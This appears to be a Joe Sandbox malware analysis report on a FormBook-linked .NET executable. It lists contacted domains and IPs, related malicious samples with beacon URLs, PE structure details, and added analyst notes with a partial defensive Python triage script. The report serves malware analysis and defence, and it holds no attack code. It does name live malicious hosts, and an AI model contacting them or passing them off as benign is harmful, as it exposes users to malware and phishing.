                                                        https://www.msn.com/en-us/money/markets/costco-is-seeing-a-gold-rush-what-s-behind-the-demand-for-itexplorer.exe, 0000000C.00000000.1308477475.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.3737130665.00000000071FC000.00000004.00000001.00020000.00000000.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        unknown
                                                        http://www.gomenasorry.comReferer:explorer.exe, 0000000C.00000003.3078569930.000000000C518000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.3077369468.000000000C515000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.3748945127.000000000C515000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.2271433902.000000000C565000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.2271102506.000000000C50B000.00000004.00000001.00020000.00000000.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        unknown
                                                        http://www.briefout.cloudexplorer.exe, 0000000C.00000003.3078569930.000000000C518000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.3077369468.000000000C515000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.3748945127.000000000C515000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.2271433902.000000000C565000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.2271102506.000000000C50B000.00000004.00000001.00020000.00000000.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        unknown
                                                        http://www.casinomaxnodepositbonus.icuReferer:explorer.exe, 0000000C.00000003.3078569930.000000000C518000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.3077369468.000000000C515000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.3748945127.000000000C515000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.2271433902.000000000C565000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.2271102506.000000000C50B000.00000004.00000001.00020000.00000000.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        unknown
                                                        http://www.plasoi.xyzexplorer.exe, 0000000C.00000003.3078569930.000000000C518000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.3077369468.000000000C515000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.3748945127.000000000C515000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.2271433902.000000000C565000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.2271102506.000000000C50B000.00000004.00000001.00020000.00000000.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        unknown
                                                        http://www.passrmale.comReferer:explorer.exe, 0000000C.00000003.3078569930.000000000C518000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.3077369468.000000000C515000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.3748945127.000000000C515000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.2271433902.000000000C565000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.2271102506.000000000C50B000.00000004.00000001.00020000.00000000.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        unknown
                                                        http://www.gmgex1.comReferer:explorer.exe, 0000000C.00000003.3078569930.000000000C518000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.3077369468.000000000C515000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.3748945127.000000000C515000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.2271433902.000000000C565000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.2271102506.000000000C50B000.00000004.00000001.00020000.00000000.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        unknown
                                                        https://www.msn.com/en-us/music/news/6-rock-ballads-that-tug-at-the-heartstrings/ar-AA1hIdsmexplorer.exe, 0000000C.00000000.1308477475.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.3737130665.00000000071FC000.00000004.00000001.00020000.00000000.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        unknown
                                                        http://www.thepeacedealers.comReferer:explorer.exe, 0000000C.00000003.3078569930.000000000C518000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.3077369468.000000000C515000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.3748945127.000000000C515000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.2271433902.000000000C565000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.2271102506.000000000C50B000.00000004.00000001.00020000.00000000.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        unknown
                                                        http://www.passrmale.com/ps15/www.trezorsuite.netexplorer.exe, 0000000C.00000003.3078569930.000000000C518000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.3077369468.000000000C515000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.3748945127.000000000C515000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.2271433902.000000000C565000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.2271102506.000000000C50B000.00000004.00000001.00020000.00000000.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        unknown
                                                        https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/AAehwh2.svgexplorer.exe, 0000000C.00000002.3737130665.00000000071FC000.00000004.00000001.00020000.00000000.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        unknown
IP               Domain                        Country        ASN    ASN Name                  Malicious
198.185.159.144  ext-sq.squarespace.com        United States  53831  SQUARESPACEUS             true
1.32.249.49      www.gmgex1.com                Singapore      64050  BCPL-SGBGPNETGlobalASNSG  false
172.96.187.60    resmierabaru20.shop           Canada         32475  SINGLEHOP-LLCUS           true
154.86.16.125    ss-k2-ss-k2.sspeeddns.com     Seychelles     40065  CNSERVERSUS               false
23.227.38.74     shops.myshopify.com           Canada         13335  CLOUDFLARENETUS           false
35.204.150.5     website-rendering.jouwweb.nl  United States  15169  GOOGLEUS                  false
Joe Sandbox version: 40.0.0 Tourmaline
Analysis ID: 1479545
Start date and time: 2024-07-23 18:27:07 +02:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 12m 9s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed: 20
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 1
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Sample name: xU0wdBC6XWRZ6UY.exe
Detection: MAL
Classification: mal100.troj.evad.winEXE@112/1@12/6
EGA Information:
• Successful, ratio: 100%
HCA Information:
• Successful, ratio: 99%
• Number of executed functions: 192
• Number of non-executed functions: 303
Cookbook Comments:
• Found application associated with file extension: .exe
• Override analysis time to 240000 for current running targets taking high CPU consumption
• Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, SIHClient.exe, SgrmBroker.exe, MoUsoCoreWorker.exe, conhost.exe, svchost.exe
• Excluded domains from analysis (whitelisted): fs.microsoft.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, time.windows.com, fe3cr.delivery.mp.microsoft.com
• Not all processes were analyzed; the report is missing behavior information
• Report creation exceeded maximum time and may have missing disassembly code information.
• Report size exceeded maximum capacity and may have missing behavior information.
• Report size exceeded maximum capacity and may have missing disassembly code.
• Report size getting too big, too many NtEnumerateKey calls found.
• Report size getting too big, too many NtOpenKey calls found.
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
• VT rate limit hit for: xU0wdBC6XWRZ6UY.exe
Time      Type             Description
12:28:03  API Interceptor  22x Sleep call for process: xU0wdBC6XWRZ6UY.exe modified
12:28:14  API Interceptor  9091988x Sleep call for process: explorer.exe modified
14:26:39  API Interceptor  8129106x Sleep call for process: cmmon32.exe modified
                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                        198.185.159.144FSW510972H6P0.exeGet hashmaliciousFormBook, DBatLoaderBrowse
                                                        • www.pinkineverything.com/de94/
                                                        http://www.crowdstrike-helpdesk.com/Get hashmaliciousUnknownBrowse
                                                        • www.crowdstrike-helpdesk.com/
                                                        eqqjbbjMlt.elfGet hashmaliciousUnknownBrowse
                                                        • coppedgeconsulting.com/wp-login.php
                                                        gUJak0onLk.elfGet hashmaliciousUnknownBrowse
                                                        • theworldsbest.party/
                                                        Wk8eTHnajw.elfGet hashmaliciousUnknownBrowse
                                                        • abdi.dev/
                                                        H37012.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                        • www.world-palace.com/h209/?nffDxB=3bAUdU4t95uzUkK5WFuz4AZbTYTbKt5vzd8g1yQ4/8rBs+wX3V9Dad+L+XTtNVooo3wA&8pYtNR=AvKPPvPH0Z4T
                                                        NEW RFQ - Viasat LSDR.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                        • www.wearelemonpepper.com/e72r/?vXuxe=pOL9EMzjwHc4QyHVW9QI7pfTUn4O8p5HvfFSzBRH6E22323sjFD6qLV7+X+RRSVqyReOs5v/G2u9Vny+UGcnPLQ2pVkVPO7CMgeIjBSUJY+lNiHbmg==&xPN=kZVT_
                                                        PO-2024151-pdf.gz.exeGet hashmaliciousFormBookBrowse
                                                        • www.cakescrushbyruby.com/mu94/?BtT4=canV/74pTpfn3A4bMmkPljt/KQtMkDnHXC3M2VvAloKUcraxhB8pz4ZRDokIm/T2krPvcjJAmw==&_R844b=WN90bd2hY6J
                                                        Salary Increament.exeGet hashmaliciousFormBookBrowse
                                                        • www.ahsanadvisory.com/ty31/?Q4=x0CzTPrVcw2ohiq+0CrnFHLZc1neteKutTnA8f7ue1wUTasMXw9SLgacUZ8mztgOHeRe&jL30v=ndnduhm
                                                        FedEx Invoice_7447707012.exeGet hashmaliciousFormBookBrowse
                                                        • www.rjh-equestrian.com/dk07/?pVOt0l=nb30yf&R2JDXj=bAVg1Oce1ASB2Lxj5WXJ5X4v8itkd1TP4YhWg2oF+1rTYJhvFaPwggMzxPIpjE9FNK1O
                                                        23.227.38.74FSW510972H6P0.exeGet hashmaliciousFormBook, DBatLoaderBrowse
                                                        • www.sewassist.com/de94/
                                                        gUJak0onLk.elfGet hashmaliciousUnknownBrowse
                                                        • shop.bikehireoldghostroad.com/
                                                        S04307164.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                        • www.wergol.com/hy08/?kBZhq=76ARE7XQpOejeJ4AXgyv9+sF91x02cjLA3TRMrZhHEY9TEByi8vF89DJ/f4r0wEyMxd7&1bY=GtxhAHB
                                                        PURCHASING ORDER.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                        • www.wergol.com/hy08/?q4k=76ARE7XQpOejeJ4AXgyv9+sF91x02cjLA3TRMrZhHEY9TEByi8vF89DJ/cA73183I0kqTGhIwQ==&3f2pj=9rDXMfLppP84JvX
                                                        Local items and pay document.exeGet hashmaliciousFormBookBrowse
                                                        • www.valerieomage.com/c7rq/?HpUtEh=httm3UUwH6NnwSQhbzeVca8kqE5bj6YPstl+OFvVeu4EU857dyc7w4+qhgXRMO7PTzi/X2HMMMtdNC+wv2+smIEknaszCFizMu+VfqPjgOzMiH+CUg==&G2A=JHe0kn
                                                        PO-2024151-pdf.gz.exeGet hashmaliciousFormBookBrowse
                                                        • www.mysleepfriend.shop/mu94/?BtT4=uYCshvBITvw0P3bJgdUC0me9QEp91dA3I2pOxSxnb4POwxqbJALQI15bQtFkGWJvtzPDe8W2sQ==&_R844b=WN90bd2hY6J
                                                        e-transac- RP062024 Nominal-PPI2452246 20240712NISPIDJA010O0100000503.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                        • www.valerieomage.com/k2gj/
                                                        09090.exeGet hashmaliciousFormBookBrowse
                                                        • www.k1l1b1.top/h5g5/?zFQHE=XnPbVpjN/8HfOp3rDocXbvIxNNdkm7UU97aTvyFkmvlSq9aR/gBP64yEqoJUhBip7UXXi/rbrVtHq2jCdN+WCRZJC/gyhFCbJVLxADgJjqZ5z2Nfpz2WUMVLMnNvBp4aqfwtpYg=&yF3=b0i4Y00xHtf
                                                        G6uGAyUSVscVBYD.exeGet hashmaliciousFormBookBrowse
                                                        • www.shophansler.com/mc10/?Nvilqt=8p8xbtXX3&mlvt=iGHCYP7HvkNR8WMjrmxz8Zzw3aZSv2pUMsXfD7V+bUPXzKfvmqDg4fbeyax9vb8sFJwW
                                                        4LPk0o7T6C.exeGet hashmaliciousFormBookBrowse
                                                        • www.day2go.net/rn94/?2ds=Ls1ijzPDaFH4ewLYvuUNL8D06n2bzs/1tKV87wXNHEYKjENRXhu0pLj1Kv8q6blj9L7T&CZbDp=fTeDovxhSZ2T70J
                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                        ss-k2-ss-k2.sspeeddns.comyEz94BK14pkJoFb.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                        • 23.224.212.27
                                                        www.trezorsuite.netyEz94BK14pkJoFb.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                        • 172.67.214.13
                                                        ext-sq.squarespace.comFSW510972H6P0.exeGet hashmaliciousFormBook, DBatLoaderBrowse
                                                        • 198.185.159.144
                                                        http://www.crowdstrike-helpdesk.com/Get hashmaliciousUnknownBrowse
                                                        • 198.185.159.144
                                                        DHL_497104778908.exeGet hashmaliciousFormBookBrowse
                                                        • 198.185.159.144
                                                        Steel pipes material data sheets Bill of Quantity Valves chemicals KM C654e21011710050.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                        • 198.185.159.144
                                                        yEz94BK14pkJoFb.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                        • 198.185.159.144
                                                        H37012.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                        • 198.185.159.144
                                                        NEW RFQ - Viasat LSDR.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                        • 198.185.159.144
                                                        PO-2024151-pdf.gz.exeGet hashmaliciousFormBookBrowse
                                                        • 198.185.159.144
                                                        Salary Increament.exeGet hashmaliciousFormBookBrowse
                                                        • 198.185.159.144
                                                        FedEx Invoice_7447707012.exeGet hashmaliciousFormBookBrowse
                                                        • 198.185.159.144
                                                        shops.myshopify.comFSW510972H6P0.exeGet hashmaliciousFormBook, DBatLoaderBrowse
                                                        • 23.227.38.74
                                                        4Ear91jgQ7.exeGet hashmaliciousFormBookBrowse
                                                        • 23.227.38.74
                                                        Transfer copy.lnkGet hashmaliciousFormBookBrowse
                                                        • 23.227.38.74
                                                        https://www.oofos.com/_t/c/A1030004-17E32A02381C380B-99C89FE9?l=AACPKmOIQynUz5zfpcqBmjasGDIqvVGCI6yd%2Bmx5Il204AMrOdUPzLvWJqL8Se24uEXtNUOpKfDyGpz%2BMqaSfQCkW0S2c8323hISpdHSusIt8BFpi66bmqQMJwi%2BbJktfoJ9aXABS5as3916UdxgYPo%2F9djyol1aq0OzViWSgYLUClaAt9n9IvBWOoNqXZwQ7U9lCAovcKcdHG8g0fwRvNd0GCBv%2BIjw2sB8f6g7teIiRvEdQ4bhOIY%2BxLlk%2BqyX9PkVn3%2BhQr6DU5zdlpX9VLAWdUzobacDP62e7yzX4qB4%2BB49w1BwkVMzlNmEuyVsrlc%2Fq%2FRK0V76Maa9joO7t55%2FexbHhmIr4ozdGpbX6J2fcatOXGqWdVx7ogE6iY78UAhKnl9IyPFEgDDs%2BdKq9O3tCpCPUg8ql5zcMR7wZNCfS81RbT4Bbeok7bHnpqVJ9pQo0aGliKwqSjBtj5pEBuIK9rF2H%2FGu1VhP0%2FcQShhqlZDK89TJHfj%2F3ujx%2Fgynt2AL0kQILStB3fuf&c=AAAV2YXmGJa8M%2FJ%2BGlIg6mZhbWUYPJMfdsdcXLFtgQK20MGfietQQg2i%2BeX5HPVtagAH7S0YP7CmhZ6qcbN6uB%2F4sIRsmz5hum4E%2FTYstaqrKncBe5spEyQdqowV33NZHE%2BoYsIcHwFu4KgwVhPuk45id7lCnk%2Fos8JrTR%2Fqp%2BxADats4CqBhZnWgBZ98CxuyGP5%2F8tWhDeK1Nuih9dNg%2F5t5l7fGabH0xLNpUXOb5Hq7kOoIQQP6T6gx%2Fhycv5lUoZCcPL7CUhFoM%2BcJasDwMQtwn46qQ6QJxiTPXgksPGJMh4OM8fqvrKCEntyMeaHi9fKEjOt%2BeIPsU0h7VzM3rWFtx6fcSJtuEMuiKAu3yDvWdy5b2tXYcBOow4MBw9ptKTiBFNRBLS%2B%2FA7qUbCcgF%2Ba5Zv3L%2BVpz9vdksuaWKhgXlgApcwsr2LADPZkvFhzAu3xg2b9HXwt09WRvzpnGet hashmaliciousHTMLPhisherBrowse
                                                        • 23.227.38.74
                                                        S04307164.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                        • 23.227.38.74
                                                        PURCHASING ORDER.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                        • 23.227.38.74
                                                        Local items and pay document.exeGet hashmaliciousFormBookBrowse
                                                        • 23.227.38.74
                                                        Payment Form+Inquiry LIST.exeGet hashmaliciousFormBookBrowse
                                                        • 23.227.38.74
                                                        http://exhibitprosper.com/r5K0.aspx?4XVH7cbbbd9tkD1cc3JlHcwglSchg7pcmcpJJhf9scGet hashmaliciousPhisherBrowse
                                                        • 23.227.38.74
                                                        PO-2024151-pdf.gz.exeGet hashmaliciousFormBookBrowse
                                                        • 23.227.38.74
                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                        SINGLEHOP-LLCUSyIRn1ZmsQF.elfGet hashmaliciousUnknownBrowse
                                                        • 107.6.134.207
                                                        zkGOUJOnmc.elfGet hashmaliciousUnknownBrowse
                                                        • 172.96.187.25
                                                        hNX3ktCRra.elfGet hashmaliciousUnknownBrowse
                                                        • 96.127.129.50
                                                        Wk8eTHnajw.elfGet hashmaliciousUnknownBrowse
                                                        • 184.154.120.191
                                                        http://sahinekici.comGet hashmaliciousUnknownBrowse
                                                        • 198.143.164.252
                                                        https://ky.codzika.xyz/pubg/Get hashmaliciousUnknownBrowse
                                                        • 67.212.184.148
                                                        SecuriteInfo.com.FileRepMalware.25505.20211.exeGet hashmaliciousUnknownBrowse
                                                        • 96.127.129.50
                                                        865VzGOmoC.elfGet hashmaliciousMiraiBrowse
                                                        • 107.6.182.135
                                                        yEz94BK14pkJoFb.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                        • 184.154.46.218
                                                        https://pub-6c03aa29b988412d989d678c4b00d9b5.r2.dev/linkd.htmlGet hashmaliciousHTMLPhisherBrowse
                                                        • 64.46.111.234
                                                        SQUARESPACEUSFSW510972H6P0.exeGet hashmaliciousFormBook, DBatLoaderBrowse
                                                        • 198.185.159.144
                                                        http://www.crowdstrike-helpdesk.com/Get hashmaliciousUnknownBrowse
                                                        • 198.49.23.177
                                                        eqqjbbjMlt.elfGet hashmaliciousUnknownBrowse
                                                        • 198.185.159.145
                                                        zkGOUJOnmc.elfGet hashmaliciousUnknownBrowse
                                                        • 198.185.159.135
                                                        hNX3ktCRra.elfGet hashmaliciousUnknownBrowse
                                                        • 198.185.159.144
                                                        Fzfee1Lgc2.elfGet hashmaliciousUnknownBrowse
                                                        • 198.185.159.145
                                                        gUJak0onLk.elfGet hashmaliciousUnknownBrowse
                                                        • 198.185.159.144
                                                        Yb6ztdvQaB.elfGet hashmaliciousUnknownBrowse
                                                        • 198.185.159.144
                                                        bJrO2iUerN.elfGet hashmaliciousUnknownBrowse
                                                        • 198.185.159.145
                                                        Wk8eTHnajw.elfGet hashmaliciousUnknownBrowse
                                                        • 198.185.159.144
Sample                                          Verdict    Detection                  IP
CNSERVERSUS
  zkGOUJOnmc.elf                                malicious  Unknown                    172.247.238.14
  gUJak0onLk.elf                                malicious  Unknown                    45.202.243.135
  Wk8eTHnajw.elf                                malicious  Unknown                    154.208.5.117
  SecuriteInfo.com.ELF.GoRAT-B.17415.21821.elf  malicious  Unknown                    156.251.172.80
  BfQ121ipnz.elf                                malicious  Mirai                      23.224.30.2
  D8J2VuFPRL.rtf                                malicious  FormBook                   154.198.247.80
  Installer.exe                                 malicious  GhostRat                   23.224.194.16
  92.249.48.47-skid.mips-2024-07-20T09_04_16.elf  malicious  Mirai, Moobot            154.91.155.194
  Arrival Notice_AWB 5460943362_PDF.vbs         malicious  FormBook, GuLoader         172.247.127.147
  yEz94BK14pkJoFb.exe                           malicious  FormBook, PureLog Stealer  23.224.212.27
BCPL-SGBGPNETGlobalASNSG
  3B4ehVz4C4.elf                                malicious  Mirai                      137.220.195.172
  2024_._._._.__._-_.exe                        malicious  Unknown                    27.124.41.234
  2024_._._._.__._-_.exe                        malicious  Unknown                    27.124.41.234
  http://whatsapp-cc.cyou/                      malicious  Unknown                    143.92.49.50
  https://www.wezvbzqo.com/                     malicious  Unknown                    143.92.52.62
  https://www.jysyxfs.com/                      malicious  Unknown                    143.92.52.62
  https://shzodws.com/                          malicious  Unknown                    143.92.52.62
  https://mj.muxin.trade/                       malicious  Unknown                    134.122.185.21
  Yiwaiwai Build Version.exe                    malicious  Unknown                    27.124.44.209
  Yiwaiwai Build Version.exe                    malicious  Unknown                    27.124.44.209
Process: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exe
File Type: ASCII text, with CRLF line terminators
Category: dropped
Size (bytes): 1415
Entropy (8bit): 5.352427679901606
Encrypted: false
SSDEEP: 24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPE4KMRaKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPHKMRatHo6hAH4
MD5: 97AD91F1C1F572C945DA12233082171D
SHA1: D5E33DDAB37E32E416FC40419FB26B3C0563519D
SHA-256: 3F64591E0447E6F5034BC69A8A8D4C7ED36DAC5FE1E408401AE1B98F0D915F7E
SHA-512: 8FAEED342DADC17571F711DDC1BE67C79A51CA5BD56B5DA13E472ED45FC4EC6F1DC704BA92E81E97F5ECFD73F3D88F9B9CD9AE4EADDF993BFF826627215FBBCE
Malicious: true
Reputation: moderate, very likely benign file
Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Data, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Data\1b8c564fd69668e6e62d136259980d9e\System.Data.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fc
File type: PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Entropy (8bit): 7.786593933855801
TrID:
• Win32 Executable (generic) Net Framework (10011505/4) 49.80%
• Win32 Executable (generic) a (10002005/4) 49.75%
• Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
• Windows Screen Saver (13104/52) 0.07%
• Generic Win/DOS Executable (2004/3) 0.01%
File name: xU0wdBC6XWRZ6UY.exe
File size: 803'328 bytes
MD5: fab057e49c317d42f565ef0efe766557
SHA1: ebdcbb656a7d0d9ca8c29239a190e1d0265573cd
SHA256: 956c41761587ea08a6eb3fca5b047ec8a3145a2d3ced9d8d3967ab351891bad4
SHA512: 61c4aac488e50417d01a5ae009c927941a45d8729c98baea372ff2a920da9f33fe4c6a222edf178a17b85e74403a1d8a1eac5ed7b262e7934f973b4552e8c737
SSDEEP: 12288:xld0Nhc1y3GJO4HIZAsoBYHy8OQHTV0zTafJbtqemyjWIBJC:jy94HIZAsby7QzV0SRd
TLSH: 3705E08877BBAF55D43963F0E5529A5053F9902A2129F6430FDB28E61FE4FC08242F97
File Content Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......f.................6..........nT... ........@.. ....................................@................................
Icon Hash: 00928e8e8686b000
Entrypoint: 0x4c546e
Entrypoint Section: .text
Digitally signed: false
Imagebase: 0x400000
Subsystem: windows gui
Image File Characteristics: EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp: 0x66991097 [Thu Jul 18 12:54:47 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major: 4
OS Version Minor: 0
File Version Major: 4
File Version Minor: 0
Subsystem Version Major: 4
Subsystem Version Minor: 0
Import Hash: f34d5f2d4577ed6d9ceec516c1f5a744
Instruction (disassembly at the entry point)
jmp dword ptr [00402000h]
add byte ptr [eax], al   (repeated 97 times: the bytes after the six-byte stub are 00 00, which decodes as this instruction; it is padding, not code)

The jump target 0x402000 is the image base 0x400000 plus the IAT at RVA 0x2000, whose single slot holds mscoree.dll!_CorExeMain (see the import table below). This is the standard native stub of a 32-bit .NET assembly: control goes straight to the CLR, so the native entry point says nothing about the payload, which lives in the managed code and resources of the high-entropy .text section.
Name                                  Virtual Address  Virtual Size  Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT          0x0              0x0
IMAGE_DIRECTORY_ENTRY_IMPORT          0xc541c          0x4f          .text
IMAGE_DIRECTORY_ENTRY_RESOURCE        0xc6000          0x800         .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION       0x0              0x0
IMAGE_DIRECTORY_ENTRY_SECURITY        0x0              0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC       0xc8000          0xc           .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG           0x0              0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT       0x0              0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR       0x0              0x0
IMAGE_DIRECTORY_ENTRY_TLS             0x0              0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG     0x0              0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT    0x0              0x0
IMAGE_DIRECTORY_ENTRY_IAT             0x2000           0x8           .text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT    0x0              0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR  0x2008           0x48          .text
IMAGE_DIRECTORY_ENTRY_RESERVED        0x0              0x0
Name    Virtual Address  Virtual Size  Raw Size  MD5                               Xored PE  ZLIB Complexity     File Type  Entropy              Characteristics
.text   0x2000           0xc3474       0xc3600   b6c0babd663553a14388f6ef241ed633  False     0.8891067358445297  data       7.7959310845493555   IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc   0xc6000          0x800         0x800     7422783d6a477a5df9845eded19fbceb  False     0.33544921875       data       3.4434375059751887   IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc  0xc8000          0xc           0x200     5d60b7409e592bb99f8937ffc4a54be2  False     0.044921875         data       0.09800417566270775  IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
Name         RVA      Size   Type                                                                              Language  Country  ZLIB Complexity
RT_VERSION   0xc6090  0x390  data                                                                              -         -        0.4232456140350877
RT_MANIFEST  0xc6430  0x1ea  XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators  -         -        0.5489795918367347
DLL          Import
mscoree.dll  _CorExeMain
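The three static facts above that matter for triage are the entry stub, the section characteristics and the .text entropy of 7.796. The following is an added example (not Joe Sandbox's code, nor anything shipped with the sample) that reproduces those checks on constructed inputs: the six bytes of the entry stub are the exact encoding of the report's `jmp dword ptr [00402000h]`, while the section bodies are synthetic (a full byte cycle for the packed case, zeros for the padding case) and do not reproduce the sample's real bytes. The 7.2 entropy threshold is an assumed heuristic, not a value from the report.

```python
# Added example (not Joe Sandbox's code): the three PE checks that matter for
# a packed .NET loader like this one, run on constructed inputs so it works
# offline.
import math
from collections import Counter

# Section characteristic bits from winnt.h (exact values)
IMAGE_SCN_CNT_CODE = 0x00000020
IMAGE_SCN_CNT_INITIALIZED_DATA = 0x00000040
IMAGE_SCN_MEM_DISCARDABLE = 0x02000000
IMAGE_SCN_MEM_EXECUTE = 0x20000000
IMAGE_SCN_MEM_READ = 0x40000000
IMAGE_SCN_MEM_WRITE = 0x80000000

FLAG_NAMES = [
    ("IMAGE_SCN_CNT_CODE", IMAGE_SCN_CNT_CODE),
    ("IMAGE_SCN_CNT_INITIALIZED_DATA", IMAGE_SCN_CNT_INITIALIZED_DATA),
    ("IMAGE_SCN_MEM_DISCARDABLE", IMAGE_SCN_MEM_DISCARDABLE),
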